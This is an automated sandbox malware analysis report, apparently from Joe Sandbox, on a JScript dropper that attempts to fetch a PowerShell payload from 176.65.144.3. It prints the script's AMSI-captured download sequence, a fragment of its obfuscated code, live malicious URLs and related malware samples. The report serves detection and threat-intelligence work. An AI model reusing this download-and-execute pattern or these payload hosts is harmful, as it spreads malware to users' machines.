Edit tour

Windows Analysis Report
11001011021.js

Overview

General Information

Sample name:11001011021.js
Analysis ID:1647017
MD5:2d974336048d6fbb4a8ab29b288b4252
SHA1:fc3260928b6dca25af9f898dd12abed79c501840
SHA256:8ec2c025e081b4bc40b329d1a280cf86a2124f4d604c8cb97e894b93763d371c
Tags:jsuser-abuse_ch
Infos:

Detection

Score:84
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • wscript.exe (PID: 6248 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6248, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49692
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", ProcessId: 6248, ProcessName: wscript.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6248, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49692
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", ProcessId: 6248, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://176.65.144.3/host/STEPHH.ps1Avira URL Cloud: Label: malware
Source: 11001011021.jsReversingLabs: Detection: 13%
Source: 11001011021.jsVirustotal: Detection: 14%Perma Link

Networking

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
Source: Joe Sandbox ViewIP Address: 176.65.144.3 176.65.144.3
Source: Joe Sandbox ViewASN Name: PALTEL-ASPALTELAutonomousSystemPS PALTEL-ASPALTELAutonomousSystemPS
Source: global trafficTCP traffic: 192.168.2.8:49692 -> 176.65.144.3:80
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: wscript.exe, 00000001.00000003.1327646950.0000016A2B464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/
Source: wscript.exe, 00000001.00000003.1327646950.0000016A2B464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/D:l)
Source: wscript.exe, 00000001.00000003.1390117109.0000016A2B3BD000.00000004.00000020.00020000.00000000.sdmp, 11001011021.jsString found in binary or memory: http://176.65.144.3/host/STEPHH.ps1
Source: wscript.exe, 00000001.00000002.1390995678.0000016A2B45D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388236498.0000016A2B45D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1327646950.0000016A2B464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388676753.0000016A2B45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/host/STEPHH.ps17&Q)%
Source: wscript.exe, 00000001.00000003.1390042068.0000016A2B3DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1390692540.0000016A2B3DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388886511.0000016A2B3B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/host/STEPHH.ps1D
Source: wscript.exe, 00000001.00000003.1327646950.0000016A2B464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/host/STEPHH.ps1E=
Source: wscript.exe, 00000001.00000003.1327646950.0000016A2B464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/host/STEPHH.ps1P&
Source: wscript.exe, 00000001.00000002.1390995678.0000016A2B45D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388236498.0000016A2B45D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1327646950.0000016A2B464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388676753.0000016A2B45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com$

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: 11001011021.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal84.evad.winJS@1/0@0/1
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 11001011021.jsReversingLabs: Detection: 13%
Source: 11001011021.jsVirustotal: Detection: 14%
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IHost.CreateObject("Scripting.FileSystemObject");IHost.CreateObject("MSXML2.XMLHTTP");IFileSystem3.FolderExists("C:\Temp");IFileSystem3.CreateFolder("C:\Temp");IServerXMLHTTPRequest2.open("GET", "http://176.65.144.3/host/STEPHH.ps1", "false");IServerXMLHTTPRequest2.send()
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000001.00000003.1388676753.0000016A2B47B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388236498.0000016A2B47B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388676753.0000016A2B42F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1327646950.0000016A2B47B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1390995678.0000016A2B47B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388236498.0000016A2B42B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1390995678.0000016A2B42F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000001.00000003.1388676753.0000016A2B42F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388236498.0000016A2B42B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1390995678.0000016A2B42F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information12
Scripting
Valid AccountsWindows Management Instrumentation12
Scripting
1
Process Injection
1
Process Injection
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
DLL Side-Loading
LSASS Memory2
System Information Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1647017 Sample: 11001011021.js Startdate: 24/03/2025 Architecture: WINDOWS Score: 84 11 Antivirus detection for URL or domain 2->11 13 Multi AV Scanner detection for submitted file 2->13 15 Sigma detected: WScript or CScript Dropper 2->15 17 Sigma detected: Script Initiated Connection to Non-Local Network 2->17 5 wscript.exe 1 13 2->5         started        process3 dnsIp4 9 176.65.144.3, 80 PALTEL-ASPALTELAutonomousSystemPS Germany 5->9 19 System process connects to network (likely due to code injection or exploit) 5->19 21 JScript performs obfuscated calls to suspicious functions 5->21 23 Windows Scripting host queries suspicious COM object (likely to drop second stage) 5->23 signatures5

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
11001011021.js14%ReversingLabsWin32.Dropper.Generic
11001011021.js15%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://176.65.144.3/0%Avira URL Cloudsafe
http://176.65.144.3/host/STEPHH.ps1E=0%Avira URL Cloudsafe
http://176.65.144.3/host/STEPHH.ps17&Q)%0%Avira URL Cloudsafe
http://176.65.144.3/host/STEPHH.ps1D0%Avira URL Cloudsafe
http://176.65.144.3/host/STEPHH.ps1P&0%Avira URL Cloudsafe
http://176.65.144.3/D:l)0%Avira URL Cloudsafe
http://176.65.144.3/host/STEPHH.ps1100%Avira URL Cloudmalware

Download Network PCAP: filteredfull

No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://176.65.144.3/host/STEPHH.ps17&Q)%wscript.exe, 00000001.00000002.1390995678.0000016A2B45D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388236498.0000016A2B45D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1327646950.0000016A2B464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388676753.0000016A2B45D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://176.65.144.3/wscript.exe, 00000001.00000003.1327646950.0000016A2B464000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
http://176.65.144.3/D:l)wscript.exe, 00000001.00000003.1327646950.0000016A2B464000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://176.65.144.3/host/STEPHH.ps1P&wscript.exe, 00000001.00000003.1327646950.0000016A2B464000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://176.65.144.3/host/STEPHH.ps1wscript.exe, 00000001.00000003.1390117109.0000016A2B3BD000.00000004.00000020.00020000.00000000.sdmp, 11001011021.jstrue
  • Avira URL Cloud: malware
unknown
http://176.65.144.3/host/STEPHH.ps1E=wscript.exe, 00000001.00000003.1327646950.0000016A2B464000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://176.65.144.3/host/STEPHH.ps1Dwscript.exe, 00000001.00000003.1390042068.0000016A2B3DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1390692540.0000016A2B3DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1388886511.0000016A2B3B4000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
176.65.144.3
unknownGermany
12975PALTEL-ASPALTELAutonomousSystemPStrue
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1647017
Start date and time:2025-03-24 14:07:44 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 42s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Without Instrumentation
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:11001011021.js
Detection:MAL
Classification:mal84.evad.winJS@1/0@0/1
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .js
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 52.149.20.212, 184.31.69.3
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.svc.static.microsoft, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
176.65.144.3#U4ed8#U6b3e#U6c47#U6b3e#U901a#U77e5.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3/host/kent.exe
xenn.ps1Get hashmaliciousRedLineBrowse
  • 176.65.144.3/dev/xenbuild.exe
Confirmaci#U00f3n de Pago.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3/FILE/KENNNTTT.ps1
STEPH.jsGet hashmaliciousFormBookBrowse
  • 176.65.144.3/FILE/STEPH.ps1
Rendel#U00e9si k#U00e9relem.exeGet hashmaliciousDarkCloudBrowse
  • 176.65.144.3/dev/fireballs.exe
MUKK.ps1Get hashmaliciousAgentTeslaBrowse
  • 176.65.144.3/dev/muhk.exe
obfuscated (1).jsGet hashmaliciousXWormBrowse
  • 176.65.144.3/dev/BRAINN.exe
KIM.ps1Get hashmaliciousStealeriumBrowse
  • 176.65.144.3/dev/Cooperbuild34.exe
KENT.ps1Get hashmaliciousRemcosBrowse
  • 176.65.144.3/dev/kent.exe
VIK.ps1.vir.txt.ps1Get hashmaliciousAgentTeslaBrowse
  • 176.65.144.3/dev/DONORIGIN.exe
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
PALTEL-ASPALTELAutonomousSystemPSpayment-pdf.jsGet hashmaliciousUnknownBrowse
  • 176.65.144.3
DHL AWB.jsGet hashmaliciousUnknownBrowse
  • 176.65.144.3
DHL AWB.jsGet hashmaliciousUnknownBrowse
  • 176.65.144.3
#U4ed8#U6b3e#U6c47#U6b3e#U901a#U77e5.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3
owari.spc.elfGet hashmaliciousUnknownBrowse
  • 213.6.206.42
SecuriteInfo.com.Win32.Trojan.Agent.QWCKHW.31433.26307.exeGet hashmaliciousUnknownBrowse
  • 176.65.138.157
xenn.ps1Get hashmaliciousRedLineBrowse
  • 176.65.144.135
Confirmaci#U00f3n de Pago.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3
STEPH.jsGet hashmaliciousFormBookBrowse
  • 176.65.144.3
No context
No context
No created / dropped files found
File type:ASCII text, with very long lines (2069), with no line terminators
Entropy (8bit):5.72103319850097
TrID:
  • Java Script (8504/1) 100.00%
File name:11001011021.js
File size:2'069 bytes
MD5:2d974336048d6fbb4a8ab29b288b4252
SHA1:fc3260928b6dca25af9f898dd12abed79c501840
SHA256:8ec2c025e081b4bc40b329d1a280cf86a2124f4d604c8cb97e894b93763d371c
SHA512:bc1c79ae4b586c8b6966aaa6ef31d8b1ff785917f8a74e8ef0a9661f9cdc28b3ec3ae244ed10b785ea2ae9e4a016034b9b1b35f62921e7763fa08ad1df3bc2c1
SSDEEP:48:1iXkepGw32/rcmxbCv9a8J6lt/axm0OUCTtWJDaNcBF:xw3krJCv9Kt/IWtER
TLSH:1B4143EE3F00E15CCB47472F8C2F8529E661FA45AD15C521E3A1AAC47C14360FD2A7AA
File Content Preview:var i=b;(function(c,d){var h=b,e=c();while(!![]){try{var f=-parseInt(h(0x18e))/0x1+parseInt(h(0x191))/0x2+-parseInt(h(0x193))/0x3*(parseInt(h(0x188))/0x4)+-parseInt(h(0x18b))/0x5+parseInt(h(0x186))/0x6*(parseInt(h(0x192))/0x7)+parseInt(h(0x189))/0x8+-pars
Icon Hash:68d69b8bb6aa9a86

Download Network PCAP: filteredfull

TimestampSource PortDest PortSource IPDest IP
Mar 24, 2025 14:09:04.651828051 CET4969280192.168.2.8176.65.144.3
Mar 24, 2025 14:09:05.660618067 CET4969280192.168.2.8176.65.144.3
Mar 24, 2025 14:09:07.676229000 CET4969280192.168.2.8176.65.144.3
Mar 24, 2025 14:09:11.691895962 CET4969280192.168.2.8176.65.144.3
Mar 24, 2025 14:09:19.691934109 CET4969280192.168.2.8176.65.144.3
050100s020406080100

Click to jump to process

050100s0.005101520MB

Click to jump to process

  • File
  • Registry

Click to dive into process behavior distribution

Target ID:1
Start time:09:09:01
Start date:24/03/2025
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js"
Imagebase:0x7ff764400000
File size:170'496 bytes
MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

No disassembly